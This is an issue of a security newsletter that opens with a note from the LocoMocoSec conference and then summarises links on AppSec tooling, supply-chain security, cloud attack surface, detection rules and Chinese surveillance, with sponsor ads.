Hey there,
I hope youâve been doing well!
LocoMocoSec đď¸
This week Iâm at LocoMocoSec in Honolulu.
Iâve been wanting to attend for a number of years, because I feel like the talks are consistently high quality and in areas I care about.
After Day 1- can confirm, the talks have been great, and Iâve met a ton of super sharp people. And that itâs sunny and right next to the beach doesnât hurt either.
(Dinner with David Belcher, Philippe De Ryck, Dino Dai Zovi, Colleen Dai, and friends whose social links I donât know yet đ )
But to keep this from becoming Keeping up with the Clintdashians (the pilot script is ready to be optioned, hit up me streaming platforms), I wanted to share a little more behind the scenes:
- I spent most of the flight out answering emails and reading articles for this newsletter.
- My first full day in Honolulu was largely working on the newsletter in my hotel room so I could relax during the conference.
- Right now itâs 11:30pm and Iâm in my hotel room finishing this newsletter while friends went swimming in the ocean.
I wanted to share this because social media and people talking about events publicly are almost always a misrepresentation, or at least a skewed representation of what actually happened.
People share the âlook at me having funâ photos and not the âlook at me eating Cheerios in my hotel room in Hawaii because Iâm finishing my newsletterâ photos.
If the latter sounds too specific to be made up, trust your instincts.
Sponsor
đ˘ Face vulnerabilities faster with a holistic view of your vulnerability data
Identifying & resolving security vulnerabilities is painful and time consumingâbut it doesn't have to be. Monad solves this problem by consolidating and correlating data from across all your vulnerability management tools and enrichment sources, such as AWS. Using an open data model, this enables security engineers to ticket and resolve vulnerabilities from a central source of truth. Eliminate the need to context switch between security tools, saving significant engineering hours for security teams with Monad. Find out more!
Learn more in the Monad blogđ In this newsletter...
- AppSec: Finding command execution sinks in decompiled JVM languages, Semgrep rules for PHP security assessments
- Web Security: Building an AppSec pipline with Burp data, a tale of 60 RCE in 60 minutes
- Supply Chain: Automate pinning of CI/CD workflow versions, evaluate GitHub org/repo/user setting security with OPA, SLSA L3 Golang native builder for GitHub Actions, free course on getting started with Sigstore
- Infrastructure as Code: Terraform Cloud adds drift detection
- Cloud Security: Tool to simulate the EC2 instance metadata service, cloud risk encyclopedia, cloud service provider agents add attack surface
- Blue Team: Sigma overview and how to write your own rules, tool to help building for air gapped environments
- Politics / Privacy: Guides on opt-ing out from data brokers, Chinese threat actor uses ransomware as a smokescreen for espionage, how China is policing the future, takeaways on China's expanding surveillance state, Microsoft's lessons learned from defending Ukraine
- Misc: Draw your cloud system architecture in Python, a no-code API testing platform that generates test cases, newsletter to learn about patents, entrepreneur's guide to business loan interest rates, a thorough analysis of SF breakfast burritos
AppSec
Finding command execution sinks in decompiled JVM languages
There are a number of languages that compile to JVM bytecode. GitLabâs Dominic
Couture walks through looking for command
execution calls in decompiled Kotlin, Groovy, Scala, and Clojure.
Semgrep rules for PHP security assessment
HN Securityâs Federico Dotta shares some general
PHP and YII framework Semgrep rules he created, focusing on SQL injection, XSS,
and authorization bypass.
Web Security
Building on an AppSec Pipeline with Burp Suite data - Part 1
Willis Vandevanter walks through using
burpsuite-project-file-parser
to extract traffic history from Burp project files, and then in part
2
presents 8 bug hunting examples using this approach. For example, âfind me all requests
that have a URL parameter named urlâ, and then test the endpoint for SSRF
and/or use ffuf.`
1001 ways to PWN prod: A tale of 60 RCE in 60 minutes
Neat slides with tons of examples, by @TheLaluka. Takeaways for defenders:
Supply Chain
sethvargo/ratchet
By Googleâs Seth Vargo: a tool for improving
the security of CI/CD workflows by automating the process of pinning and
unpinning upstream versions. Itâs like Bundler, NPM, or Pip, but for CI/CD
workflows. Currently supports Circle CI, GitHub Actions, Google Cloud Build.
Evaluate Your Source Control Security Posture with GitGat
Scribe Security announces
GitGat, a tool that uses OPA policies
to evaluate GitHub organization/repositories/user accounts security: access
controls, permissions, branch protection, and file modification tracking.
General Availability of SLSA 3 Go native builder for GitHub Actions
Thereâs now a GitHub Action you can use that fulfills the properties of SLSA level 3. This allows you to:
- Detect rollback attacks, invalid source (due to expired and invalid domains), recycled GitHub accounts, and recreated GitHub repos
- Validate the process used to build the binary
- Check how an artifact was built (dev vs prod build, was the build sanitized or hardened with security options like PIE, etc.)
Get Started with Sigstore (Free Course!)
Chainguardâs Lisa Tagliaferri and John
Speed Meyers announce
a new Sigstore course to educate the industry on how to digitally sign software
artifacts to ensure a safer chain of custody that can be traced back to the
source. Contents:
- Introducing Sigstore
- Cosign: Container Signing, Verification, and Storage in an OCI Registry
- Fulcio: A New Kind of Root Certificate Authority For Code Signing
- Rekor: Software Supply Chain Transparency Log
- Sigstore: Using the Tools and Getting Involved with the Community
Infrastructure as Code
Terraform Cloud Adds Drift Detection for Infrastructure Management
This new feature of Terraform Cloud continuously checks infrastructure state to
detect and notify operators of any changes, minimizing risk, downtime, and
costs. Itâll be interesting to see if this impacts any security vendors who
similarly offer drift detection.
Cloud Security
aws/amazon-ec2-metadata-mock
A tool to simulate Amazon EC2 instance metadata service for local testing.
Cloud Risk Encyclopedia
By Orca Security: âSearch 1200+ cloud security
risks or filter by cloud vendor, compliance framework, risk category, and
criticality. 3 cloud platforms. 47 compliance frameworks. 18 risk categories. 4
risk levels.â
The cloud gray zoneâ- secret agents installed by cloud service providers
By Wizâs Nir Ohfeld and Shir Tamari: Cloud service providers install proprietary software on customersâ virtual machines typically without the customerâs awareness or explicit consent. This cloud middleware software, which bridges customersâ virtual machines and cloud providersâ managed services, can introduce new potential attack surface.
Wiz has launched a GitHub page to map all the agents that cloud providers are installing on customersâ machines along with the additional attack surface they introduce.
Blue Team
A deep dive into Sigma rules and how to write your own threat detection rules
Sigma rules are a common language that enable defenders to share detections, and
avoid vendor lock-in, easily running the same rules on many SIEMs. FourCoreâs
Hardik Manocha walks through the
structure of Sigma rules and how to write your own.
Hoppr
Hoppr helps your applications and build dependencies hop between air gapped
environments. Itâs a framework that supports packaging, transfer, and delivery of
dependencies. Hoppr relies on the principles of Linux Foundationâs focus on SPDX
and the extended functionality of CycloneDX to define Software Bill-of-Materials
and supply chain management.
Sponsor
đ˘ Conveyor's Vendor Trust platform: Never send another vendor security questionnaire
Tired of chasing vendors, tracking down SOC 2 reports, and trying to get them to fill out your security questionnaire?
Conveyorâs Vendor Trust platform speeds vendor reviews by 5X by parsing your vendors' security docs, answering your questions for you, highlighting exceptions, and mapping their policies to your controls. Try it for free.
Sign up for freePolitics / Privacy
Delete Me: Opt-Out Guides
Massive list of how to guides to opt out of various data brokers.
Chinese Threat Actor Uses Ransomware as a âSmokescreenâ For Espionage
A Chinese-based threat actor has been launching ransomware attacks against
organizations in the U.S. and other countries, but researchers believe that the
threat actorâs end goal is stealing intellectual property as opposed to
financial gain, and they estimated that 75 percent of the known victims would be
of interest to Chinese government-sponsored groups focused on espionage based on
the victimsâ geographic locations and industry verticals.
How China Is Policing the Future
With a simple fill-in-the-blank menu, the police can base alarms on specific parameters, including where a blacklisted person appears, when the person moves around, whether he or she meets with other blacklisted people and the frequency of certain activities. The police could set the system to send a warning each time two people with a history of drug use check into the same hotel or when four people with a history of protest enter the same park.
Whether or not he triggered the system, Mr. Zhang has noticed a change. Whenever he turns off his phone, he said, officers show up at his house to check that he hasnât left on a new trip to Beijing.
Chinaâs Expanding Surveillance State: Takeaways From a NYT Investigation
Chinaâs ambition to collect a staggering amount of personal data from everyday citizens is more expansive than previously known, a Times investigation has found. Phone-tracking devices are now everywhere. The police are creating some of the largest DNA databases in the world. And the authorities are building upon facial recognition technology to collect voice prints from the general public.
Defending Ukraine: Early Lessons from the Cyber War
This report represents research conducted by Microsoftâs threat intelligence and data science teams with the goal of sharpening our understanding of the threat landscape in the ongoing war in Ukraine. The report also offers a series of lessons and conclusions resulting from the data gathered and analyzed. Notably, the report reveals new information about Russian efforts including an increase in network penetration and espionage activities amongst allied governments, non-profits and other organizations outside Ukraine. This report also unveils detail about sophisticated and widespread Russian foreign influence operations being used among other things, to undermine Western unity and bolster their war efforts. We are seeing these foreign influence operations enacted in force in a coordinated fashion along with the full range of cyber destructive and espionage campaigns.
Misc
Diagram as Code
Draw your cloud system architecture in Python code and track it in version
control. Currently supports six major cloud providers (AWS, Azure, GCP, etc),
on-premise nodes, and programming languages and frameworks.
keploy/keploy
By Keploy: A no-code API testing platform that
generates test cases and data mocks from API calls. Dependency-mocks are
automatically generated with the recorded request/responses.
Patent Drop Newsletter
Every week @thisisneer provides a summary of 3
new patents from big tech companies and a wider list of all patents from these
companies.
The Entrepreneurâs Guide to Business Loan Interest Rates
Nicely detailed guide by The Hustle.
Supporting Your Team When the News Is Terrible
Tips by Harvard Business Review for managers during stressful times.
An Extremely Thorough Analysis of Breakfast Burritos in SF
Now this is some research I can get behind đ
âď¸ Wrapping Up
Have questions, comments, or feedback? Just reply directly, I'd love to hear from you.
If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them đ
Thanks for reading!
Cheers,Clint
@clintgibler